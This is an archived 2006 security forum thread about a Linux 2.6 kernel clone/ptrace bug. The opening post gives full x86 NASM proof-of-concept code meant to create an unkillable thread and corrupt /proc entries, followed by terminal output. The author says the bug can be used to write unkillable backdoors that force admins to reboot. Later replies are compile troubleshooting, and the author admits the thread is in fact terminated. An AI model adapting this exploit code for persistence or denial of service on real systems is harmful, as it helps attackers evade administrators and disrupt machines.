Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 28, 2020
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 327
Members: 0
Total: 327
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Linux world -> NEW! Unkillable thread + procfs corruption Goto page 1, 2  Next
Post new topic  Reply to topic View previous topic :: View next topic 
NEW! Unkillable thread + procfs corruption
PostPosted: Tue Jan 10, 2006 4:28 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




This is a new PoC of the old bug I found, now it can run the thread!!!
And in the old bug, the thread could be killed re-attaching it, now it can't!!!
And one more thing, some of the ProcFS info is corrupted, so you can't see some things as maps, mem, and tasks.
I'm testing on a 2.6.11, last time on a 2.6.13 the old version worked.
A friend toldme that in 2.6.14 you can kill it Sad
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot

Quote:

CLONE_VM equ 0x00000100
CLONE_THREAD equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD equ 17

[extern printf]

[section .data]
forked db " >> fork: %d",10,0

[section .text]
no_child:
push eax
push forked
call printf
xor ebx, ebx
mov eax, 1
call 0xffffe400
bad:
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
mov ebx, 1
mov ecx, ..@4.cadena
mov edx, 23+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400
main:
mov eax, 2
call 0xffffe400
test eax, eax
jnz no_child
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
mov ebx, 1
mov ecx, ..@13.cadena
mov edx, 22+1
mov eax, 4
call 0xffffe400
mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD
xor ecx, ecx
mov eax, 120
call 0xffffe400
test eax, eax
jz child
test eax, 0x80000000
jnz bad
xor ebx, ebx
mov eax, 1
call 0xffffe400
child:
xor ebx, ebx
mov eax, 26
call 0xffffe400
test eax, eax
jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
mov ebx, 1
mov ecx, ..@26.cadena
mov edx, 31+1
mov eax, 4
call 0xffffe400
aki: jmp aki
bad2:
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
mov ebx, 1
mov ecx, ..@32.cadena
mov edx, 16+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400


Quote:

erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inv?lido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Tue Jan 10, 2006 5:33 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




well, I did some more tests, and the thread is terminated, but the structures still there, so is really killed Sad
I will try to do some more tests to se if I can find a way to keep the thread running
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 11, 2006 10:41 am Reply with quote
fizzi
Advanced user
Advanced user
 
Joined: Sep 14, 2005
Posts: 55




hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps u can tell me to get this thing compiled for amd64 or 32bit arch.
View user's profile Send private message
PostPosted: Wed Jan 11, 2006 2:42 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




fizzi wrote:
hi
i tried to compilie your progg under amd64 but it didn't work. i got kernel 2.6.15 and i get
Quote:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps u can tell me to get this thing compiled for amd64 or 32bit arch.


Is only for x86
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jan 11, 2006 3:09 pm Reply with quote
fizzi
Advanced user
Advanced user
 
Joined: Sep 14, 2005
Posts: 55




yeah, but isn't amd64 compatible to 32bit programs?
so, this should also work on my x86_64 architecture, but it just won't compile.
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 1:21 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 3:32 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




shai-tan wrote:
Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versi?n 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.Cool

btw I send a patch of another bug in clone and was added to the -mm tree
Is called i386-sys_clone-from-vsyscall.patch
I'm very happy Very Happy
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Jan 12, 2006 5:21 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Ah maybe its gcc 4.0 which is breaking it.

Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:29 pm Reply with quote
fizzi
Advanced user
Advanced user
 
Joined: Sep 14, 2005
Posts: 55




shai-tan wrote:
Hey erg0t hows everything holding up? Ah isnt assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell I wish the kernel team had made a 2.7 development kernel because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed. To keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


As i can see, this is the same error message i get when i try to compile this thingy. but i got amd64 and gcc 3.4.4
"undefined reference to main" ... seems he cant find the main routine. so ... any other linker or compiler i can choose?
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:37 pm Reply with quote
fizzi
Advanced user
Advanced user
 
Joined: Sep 14, 2005
Posts: 55




Quote:
gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

Ok, i'm getting closer ...
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 7:47 pm Reply with quote
fizzi
Advanced user
Advanced user
 
Joined: Sep 14, 2005
Posts: 55




Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

i give up
View user's profile Send private message
PostPosted: Thu Jan 12, 2006 8:07 pm Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




fizzi wrote:
Quote:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

i give up


The problem is that nasm generates code only for x86, maybe you can convert the code to gas.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 13, 2006 6:05 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Well I use x86 and why is it not working?

Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Fri Jan 13, 2006 10:02 am Reply with quote
erg0t
Valuable expert
Valuable expert
 
Joined: Apr 08, 2005
Posts: 55
Location: Uruguay




shai-tan wrote:
Well I use x86 and why is it not working?

Shai-tan


Sorry, I know what is happening, I use lot of macros I made for my code, so to get a code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before containing [global main]. So to get the code working you have to add global main to the top of the code.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Jan 13, 2006 10:17 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Ah I see.

Thanks. I'll get round to it later cause Im a bit busy tonight. Ill tell you what happens


Shai-tan

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
NEW! Unkillable thread + procfs corruption
  www.waraxe.us Forum Index -> Linux world
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 2  
Goto page 1, 2  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Hardware reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.074 Seconds